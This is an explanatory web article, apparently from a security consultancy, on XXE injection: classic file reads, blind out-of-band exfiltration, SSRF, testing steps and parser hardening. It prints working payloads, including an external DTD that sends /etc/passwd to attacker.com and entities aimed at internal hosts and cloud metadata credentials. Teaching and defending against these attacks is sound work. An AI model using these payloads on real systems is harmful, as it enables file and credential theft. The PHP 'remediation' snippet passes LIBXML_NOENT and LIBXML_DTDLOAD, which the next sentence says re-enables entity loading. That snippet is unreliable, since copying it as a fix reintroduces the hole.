Skip to content
Fast-turnaround security assessments available — 10+ years development & security experienceGet started
vulnerabilityCWE-611OWASP A05:2021Typical severity: High

XXE: XML External Entity Injection Explained

·9 min read

XXE: XML External Entity Injection Explained

XML External Entity injection is a vulnerability class where the danger comes not from attacker-controlled code reaching a dangerous function, but from a feature working exactly as the specification intended. External entities are a legitimate part of the XML standard. The vulnerability is that applications allow untrusted input to control which external resources the parser retrieves.

Understanding XXE requires understanding what XML entities are and why external resolution exists in the first place.

How XML Entities Work

An XML entity is a named shorthand that expands to its declared value when referenced in the document. Internal entities are entirely self-contained:

xml
<?xml version="1.0"?>
<!DOCTYPE config [
  <!ENTITY appname "MyApplication">
]>
<config>
  <title>&appname; Configuration</title>
</config>

When parsed, &appname; expands to "MyApplication". This is a straightforward text substitution mechanism.

External entities extend this by pointing the entity declaration at a resource outside the document:

xml
<?xml version="1.0"?>
<!DOCTYPE config [
  <!ENTITY disclaimer SYSTEM "file:///legal/disclaimer.txt">
]>
<config>
  <footer>&disclaimer;</footer>
</config>

Here, the parser retrieves the contents of /legal/disclaimer.txt and substitutes them wherever &disclaimer; appears. The SYSTEM keyword indicates an external resource, and the URI scheme determines what kind of resource is fetched: file:// for local files, http:// for URLs, expect:// in PHP for command output.

When an application accepts XML from untrusted sources and processes it with a parser that resolves external entities, the attacker controls what the parser retrieves.

Classic XXE: Reading Local Files

The most direct form of XXE exploits the file:// URI scheme to read files from the server's filesystem.

A vulnerable application might accept XML for data import, configuration uploads, document processing, or SOAP API calls. The attacker submits:

xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <data>&xxe;</data>
</root>

If the parser resolves external entities and the application returns any parsed value from the <data> element in its response, the contents of /etc/passwd appear in the HTTP response body.

This technique works against files the process has read access to. Common targets:

  • /etc/passwd — system user list, confirms the vulnerability and reveals usernames
  • /etc/hosts — internal network hostnames and IP addresses
  • ~/.ssh/id_rsa — SSH private keys for the user running the application
  • Application configuration files at known paths — database credentials, API keys, connection strings
  • /proc/self/environ — environment variables including secrets passed at process start
  • Cloud instance metadata at http://169.254.169.254/ — identity credentials, IAM roles

The constraint is that file contents must be syntactically valid when substituted into the XML document. A file containing XML-special characters (<, >, &) will break the document structure and may cause a parse error before the contents can be read. This is addressed using CDATA sections or by reading the file indirectly through a crafted DTD.

Blind XXE: Out-of-Band Exfiltration

Many applications process XML without reflecting the parsed content in any response. They return a status code, a generic confirmation, or an entirely separate data structure. The parser resolves entities but the entity values never appear in the output the attacker can observe.

This is blind XXE. The application is vulnerable, but direct reading is not possible. Instead, the attacker redirects the retrieved content to an external destination they control.

Parameter Entities and Out-of-Band DTDs

Standard XML entities (general entities) cannot reference other entities within entity declarations. This limitation prevents constructing file-read payloads inline. Parameter entities — declared with % and usable only within DOCTYPE declarations — do not have this restriction.

An attacker hosts an external DTD file on their own server:

xml
<!-- attacker.com/evil.dtd -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % exfil "<!ENTITY &#37; send SYSTEM 'http://attacker.com/?data=%file;'>">
%exfil;
%send;

The attack payload instructs the vulnerable parser to load this external DTD:

xml
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd">
  %remote;
]>
<foo>trigger</foo>

When the parser processes this document, it fetches the external DTD, which defines a chain of parameter entities. The chain reads the target file and constructs an HTTP request to the attacker's server with the file contents encoded in the URL. The attacker's server receives the DNS lookup and HTTP request, logging the exfiltrated data even though the vulnerable application's HTTP response reveals nothing.

DNS-Only Blind XXE

When outbound HTTP connections from the server are blocked but DNS is permitted, even a single DNS lookup confirms exploitability. Pointing an external entity at http://uniqueid.attacker.com/ causes the vulnerable parser to perform a DNS resolution for that subdomain. Observing the DNS lookup on the attacker's nameserver confirms that external entity resolution is occurring.

XXE for Server-Side Request Forgery

External entity URIs are not limited to file://. The http:// scheme causes the parser to make an HTTP request to the specified URL. When that URL points to internal network addresses rather than external domains, this becomes server-side request forgery originating from the server's internal network position.

xml
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY ssrf SYSTEM "http://192.168.1.1/admin">
]>
<root>&ssrf;</root>

The parser makes an HTTP request to 192.168.1.1/admin from the server's perspective. The response content may appear in the application's output or trigger different application behavior depending on the response received.

This provides access to:

  • Internal administrative interfaces not exposed to the internet
  • Cloud provider metadata services (169.254.169.254)
  • Services bound to localhost that trust internal traffic
  • Other microservices on the same network segment that do not authenticate requests from internal addresses

XXE-based SSRF is particularly effective in cloud environments where the instance metadata service at http://169.254.169.254/latest/meta-data/iam/security-credentials/ returns temporary IAM credentials that grant cloud API access.

Finding XXE Injection Points

Any endpoint that accepts XML is a potential XXE target. The attack surface is wider than most developers expect.

Obvious XML endpoints: SOAP web services, XML-RPC, document processors (DOCX, XLSX, SVG), RSS/Atom feed parsers, and configuration upload forms. These accept XML by design and are frequently tested.

Less obvious XML endpoints: Content-type header manipulation can reveal XML parsers behind JSON-looking interfaces. Changing Content-Type: application/json to Content-Type: application/xml and submitting an XML equivalent of the original request sometimes reveals XML parsers that process both formats.

File upload endpoints: DOCX, XLSX, PPTX, and SVG files are ZIP archives containing XML. An SVG file is XML. Uploading a crafted SVG or Office document with external entity declarations to endpoints that process these formats may trigger XXE in the document processing library. This is a common finding in applications that accept user-uploaded documents and render or summarize them server-side.

Indirect XML consumers: Libraries used for serialization, configuration loading, and template processing sometimes consume XML internally. A library deserializing an object from XML using an attacker-influenced input path can be vulnerable without the developer being aware that XML is processed.

When testing a suspected endpoint:

  1. Submit a basic XXE payload and observe whether the response changes in timing, content, or error messaging
  2. Point the external entity at a URL you control and watch for DNS or HTTP callbacks
  3. If callbacks arrive, proceed with file read or SSRF payloads
  4. If no callbacks arrive, the parser likely has external entity resolution disabled

The Impact of Poorly Configured Parsers

The severity of XXE depends on what the vulnerable application can access and what it returns.

A publicly-facing application running with limited filesystem permissions that reflects entity values in error messages can read application configuration files containing database credentials — a direct path from low-severity file disclosure to full database access.

An internal tool running with elevated permissions on a network with access to cloud metadata services turns an XXE vulnerability into AWS, GCP, or Azure credential theft, granting cloud API access that may far exceed what the application itself was intended to provide.

The vulnerability is the external entity resolution. The impact is a function of the environment.

Remediation

Disable External Entity Processing

The correct fix is to configure the XML parser to refuse to process external entities and external DTDs before any input reaches it. This is a parser configuration change, not an input validation rule.

Java (DocumentBuilderFactory):

java
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
factory.setXIncludeAware(false);
factory.setExpandEntityReferences(false);

Java (XMLInputFactory for StAX parsers):

java
XMLInputFactory factory = XMLInputFactory.newInstance();
factory.setProperty(XMLInputFactory.SUPPORT_DTD, false);
factory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);

Python:

Use the defusedxml library instead of the standard xml.etree.ElementTree or lxml. It disables all dangerous XML features by default:

python
import defusedxml.ElementTree as ET
tree = ET.parse(xml_file)  # Safe — external entities and DTDs disabled

PHP:

php
libxml_disable_entity_loader(true);  // PHP < 8.0
// PHP 8.0+ disables external entity loading by default
$doc = new DOMDocument();
$doc->loadXML($xml, LIBXML_NOENT | LIBXML_DTDLOAD);

In PHP 8.0 and later, external entity loading is disabled by default, but explicitly passing LIBXML_NOENT to loadXML() re-enables it — a common accidental reintroduction.

Use Safer Data Formats

If the endpoint does not specifically require XML, replace it with JSON. JSON parsers do not have a concept of external references. There are no entity declarations, no DTDs, no external resource resolution. The entire vulnerability class is eliminated.

For internal services where format choice is flexible, this is the preferred approach.

Validate XML Schema Without Entity Resolution

If XML is required, validate documents against a strict schema after disabling external entity processing. Schema validation cannot substitute for disabling external entities — validation occurs after parsing, and parsing with external entities enabled is when the damage occurs. The order matters: disable external entity resolution first, then validate structure.

Why Filtering Does Not Work

A common remediation attempt is to filter the input for DOCTYPE declarations or the SYSTEM keyword. This is insufficient. DOCTYPE can be encoded using alternative character representations. SYSTEM can appear in unusual contexts. Character encoding variations in the XML declaration can cause character-by-character filtering to miss the pattern.

The vulnerability is not in the document's content reaching application code. It is in the parser executing the XML specification's external entity feature. Only disabling that feature in the parser prevents the vulnerability. Filtering what reaches the parser is an arms race that defenders reliably lose against a sufficiently motivated attacker.

Need your application's XML attack surface assessed? Get in touch.

Need your application tested?

We find these vulnerabilities in real applications every day. Get a comprehensive security assessment with detailed remediation.

Request an Assessment

Summary

XML External Entity (XXE) injection exploits the way XML parsers resolve external references embedded in document markup. An attacker who can supply XML to a vulnerable endpoint can read arbitrary files from the server, perform server-side request forgery, and in specific configurations achieve remote code execution — all through a feature that exists in the XML specification itself.

Key Takeaways

  • 1XXE injection exploits the XML specification's external entity feature, which allows XML documents to reference and include content from external sources such as local files or URLs
  • 2Classic XXE allows attackers to read arbitrary files from the server filesystem by declaring an entity that references a file path and printing the entity value in the XML response
  • 3Blind XXE sends retrieved data to an attacker-controlled server using out-of-band techniques when the application does not reflect XML content in its response
  • 4XXE can be used for server-side request forgery by pointing the external entity at internal network addresses, allowing attackers to probe services behind firewalls
  • 5The fix is to disable external entity processing in the XML parser — not to filter input — because the vulnerability is in the parser configuration, not the document content

Frequently Asked Questions

XML External Entity (XXE) injection is a vulnerability in how an application processes XML input. XML allows documents to define entities — named references that expand to their declared value when the document is parsed. External entities reference content from outside the document itself, such as a file path or a URL. When an XML parser resolves external entities from attacker-controlled input, the attacker can point those references at local files or internal network addresses, causing the parser to retrieve and potentially expose that content.

An attacker submits an XML document with a DOCTYPE declaration that defines an external entity referencing a file path, such as /etc/passwd. If the parser resolves the entity, it reads the file contents and substitutes them wherever the entity appears in the document. If the application returns any portion of the parsed XML in its response — an error message, a confirmation, or a processed value — the file contents are included. This technique requires the application to reflect XML-derived content, which makes it the simplest form of XXE.

Blind XXE occurs when the application processes attacker-controlled XML but does not reflect the parsed content in its HTTP response. The attacker cannot directly observe whether external entities were resolved. To exfiltrate data, the attacker uses out-of-band techniques: they declare an entity that makes an HTTP request to an attacker-controlled server, embedding the target file's contents in a URL query parameter. The attacker's server receives the DNS lookup or HTTP request and logs the encoded file contents. This requires the XML parser to be able to make outbound network connections.

Direct remote code execution through XXE is uncommon but possible in specific configurations. The PHP expect:// stream wrapper, if enabled, allows executing system commands through an external entity reference. Some Java XML parsers combined with specific library versions have allowed code execution through crafted entity expansion. More practically, XXE is frequently used as a stepping stone: it enables reading configuration files, application secrets, and SSH keys that can be leveraged for further access rather than executing code directly through the parser.

Prevention requires disabling external entity processing and DOCTYPE declarations in the XML parser configuration before any untrusted input is parsed. The specific setting depends on the language and library: in Java, set the XMLInputFactory and DocumentBuilderFactory to disable external DTDs and entities; in PHP, use libxml_disable_entity_loader(true) before parsing; in Python, use the defusedxml library instead of the standard ElementTree. Input validation does not prevent XXE — the vulnerability is triggered by the parser's own feature set, not by the content of the document reaching application code.